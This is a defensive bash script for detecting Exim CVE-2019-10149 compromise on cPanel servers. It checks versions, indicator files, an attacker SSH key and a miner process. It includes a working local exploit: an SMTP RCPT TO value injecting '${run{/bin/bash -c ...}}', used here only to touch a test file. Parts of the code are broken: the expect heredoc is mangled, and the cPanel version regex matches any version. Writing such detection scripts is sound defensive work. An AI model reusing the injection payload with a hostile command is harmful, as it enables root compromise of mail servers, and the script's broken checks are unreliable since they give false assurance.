#!/usr/bin/env bash ## quick and dirty way to check for indication of compromise. ## feel free to make it pretty. ## if expect and openssl are available, it also checks for local ## exploitation. ## For testing remote exploit, check out eximrce.py #fail() { echo -e "$(tput setaf 196)$*$(tput setaf 255)"; } fail() { printf '\e[1;91m%s\e[0m\n' "$1"; } #warn() { echo -e "$(tput setaf 190)$*$(tput setaf 255)"; } warn() { printf '\e[1;93m%s\e[0m\n' "$1"; } #pass() { echo -e "$(tput setaf 82)$*$(tput setaf 255)"; } pass() { printf '\e[1;92m%s\e[0m\n' "$1"; } #info() { echo -e "$(tput setaf 14)$*$(tput setaf 255)"; } info() { printf '\e[1;96m%s\e[0m\n' "$1"; } #white() { echo -e "$(tput setaf 255)$*$(tput setaf 255)"; } white() { printf '\e[1;97m%s\e[0m\n' "$1"; } EXIMVER="$(rpm -q exim | grep exim)" if [[ -z $EXIMVER ]]; then pass "Exim not installed....exiting." exit 1 else #warn "Exim version: $EXIMVER" echo "$EXIMVER" | grep -Eq 'exim-4.91-4.cp1170.x86_64|exim-4.92-1.cp1178.x86_64|exim-4.92-1.cp1180.x86_64' && pass "Exim version is verified to be patched: $EXIMVER" || fail "Exim version is out of date or unknown: $EXIMVER" fi CPTIER="$(cat /etc/cpupdate.conf | grep CPANEL | cut -f2 -d=)" CPFREQ="$(cat /etc/cpupdate.conf | grep UPDATES | cut -f2 -d=)" info "cPanel update tier $CPTIER, frequency $CPFREQ" CPVER="$(cat /usr/local/cpanel/version)" echo "$CPVER" | grep -Eq "|||11.80.0.[0-9]{1,2}" && pass "cPanel version is verified to be patched: $CPVER" || fail "cPanel version is out of date or unknown: $CPVER" info "Running additional Exim and cPanel checks" # Check for fatal errors during the upgrade grep -q FATAL /var/cpanel/updatelogs/last && fail "Fatal errors detected in /var/cpanel/updatelogs/last:" && grep --color=never FATAL /var/cpanel/updatelogs/last || pass "No fatal errors detected in /var/cpanel/updatelogs/last" # Check for automatic updates grep -q UPDATES=daily /etc/cpupdate.conf && pass "Automatic updates are enabled in /etc/cpupdate.conf" || ( fail "Automatic updates are disabled in /etc/cpupdate.conf" grep --color=never ^UPDATES /etc/cpupdate.conf ) BADPROC=$(pgrep kthrotlds) RETCODE="1" echo -e "\n==================================\n" vuln-check() { rm -f /root/lweximtest PORT=$(grep 'daemon_smtp_ports' /etc/exim.conf | awk '{print $3}') OUTPUT=$( expect <\r" expect "250 " send "rcpt to:root+\\\${run{\\\x2fbin\\\x2fbash\\\x20\\\x2dc\\\x20\\\x22touch\\\x20\\\x2froot\\\x2flweximtest\\\x22\\\x20\\\x26}}@localhost\r" expect "250 " send "DATA\r" expect "354 " send "Received: 1 Received: 2 Received: 3 Received: 4 Received: 5 Received: 6 Received: 7 Received: 8 Received: 9 Received: 10 Received: 11 Received: 12 Received: 13 Received: 14 Received: 15 Received: 16 Received: 17 Received: 18 Received: 19 Received: 20 Received: 21 Received: 22 Received: 23 Received: 24 Received: 25 Received: 26 Received: 27 Received: 28 Received: 29 Received: 30 Received: 31\r" send ".\r" expect "250 " send "quit" EOF ) RETCODE=$? #echo "Expect's return value: $?" #echo "Expect output: $OUTPUT" #echo "return code: $RETCODE" } if [[ -x "$(command -v expect)" ]] && [[ -x "$(command -v openssl)" ]]; then vuln-check 2 &>/dev/null fi #info "Checking for indication of compromise. Files below failed RPM verification. Additional review required." #rpmverify crontabs | grep '/etc/crontab' #rpm -q bind &>/dev/null && rpmverify bind #rpm -q ntp &>/dev/null && rpmverify ntp echo -e "\n" #info "Outputs (if present) below could indicate server is likely compromised. Additional review required." declare -a ioc=("/.cache" "/root/.cache/.a" "/root/.cache/.favicon.ico" "/root/.cache/.kswapd" "/root/.cache/.sysud" "/etc/cron.d/root" "/etc/cron.monthly/cronlog" "/var/spool/cron/crontabs/root" "/usr/local/bin/nptd" "/root/.editorinfo") for i in "${ioc[@]}"; do if [[ -e "$i" ]]; then warn "$i exists, contents below" for j in $i; do if [ -d $j ]; then ls -lartch $j else head -c 100 "$j" echo -e "\n" fi done fi done if [[ -s /lib/libgrubd.so ]]; then fail "WARNING: Found '/lib/libgrubd.so'! The server should be considered compromised" elif [[ -f /lib/libgrubd.so ]]; then info "INFO: our mitigation for '/lib/libgrubd.so' is present" fi if [[ -s /etc/ld.so.preload ]]; then warn "WARNING: Found '/etc/ld.so.preload' Checking.." if [[ ! -z $(grep -l '/lib/libgrubd.so' /etc/ld.so.preload) ]]; then fail "WARNING: Found '/lib/libgrubd.so' in '/etc/ld.so.preload'! Server should be considered compromised." else warn "/etc/ld.so.preload does not contain libgrubd.so, check it anyway" fi elif [[ -e /etc/ld.so.preload ]]; then info "INFO: our mitigation for '/lib/libgrubd.so' is present" fi ## attacker key in authorized_keys, host is user@localhost if [[ -f /root/.ssh/authorized_keys ]]; then BADKEY="$(cat /root/.ssh/authorized_keys | grep "Z5DrA76WH user@localhost")" ## if known key is found if [[ ! -z "$BADKEY" ]]; then fail "\nAttacker key exists" fail "$BADKEY\n" fi UNKNOWNKEY="$(cat /root/.ssh/authorized_keys | grep -v "Z5DrA76WH" | grep " user@localhost")" if [[ ! -z "$UNKNOWNKEY" ]]; then fail "\nUnknown bad ssh key found, please notify secteam" fail "$UNKNOWNKEY\n" fi fi ## checking to see if process kthrotlds is running, and kill it. if [[ ! -z "$BADPROC" ]]; then fail "kthrotlds mining process found....killing $BADPROC" kill -9 $BADPROC >/dev/null 2>&1 fi info "Checking for possible local exploit" if [[ "$RETCODE" == 0 ]]; then TESTID=$(grep -rail '${run.*lweximtest' /var/spool/exim/input/ |sed -e 's/^.*\/\([a-zA-Z0-9-]*\)-[DH]$/\1/g') for i in $TESTID; do # this is needed to make sure test message was ran, on slow servers. #info "Test message found, forcing delivery $i" exim -M $i >/dev/null 2>&1 # removing the test message exim -Mrm $i >/dev/null 2>&1 done if [[ -f /root/lweximtest ]]; then fail "SERVER IS VULNERABLE TO LOCAL EXIM CVE-2019-10149" else pass "Server is NOT vulnerable to local EXIM CVE-2019-10149" fi else info "Check failed. Exim log may indicate why." fi # remove any message in queue that contains the exploit info "Checking for exploit message in queue, wait..." BADMSG=$(grep -rail '${run' /var/spool/exim/input/ |sed -e 's/^.*\/\([a-zA-Z0-9-]*\)-[DH]$/\1/g') if [[ ! -z "$BADMSG" ]]; then for i in $BADMSG; do warn "Exploit message found: $i. Removing..." exim -Mrm $i >/dev/null 2>&1 done else info "No exploit message found in queue." fi # remove test file rm -f /root/lweximtest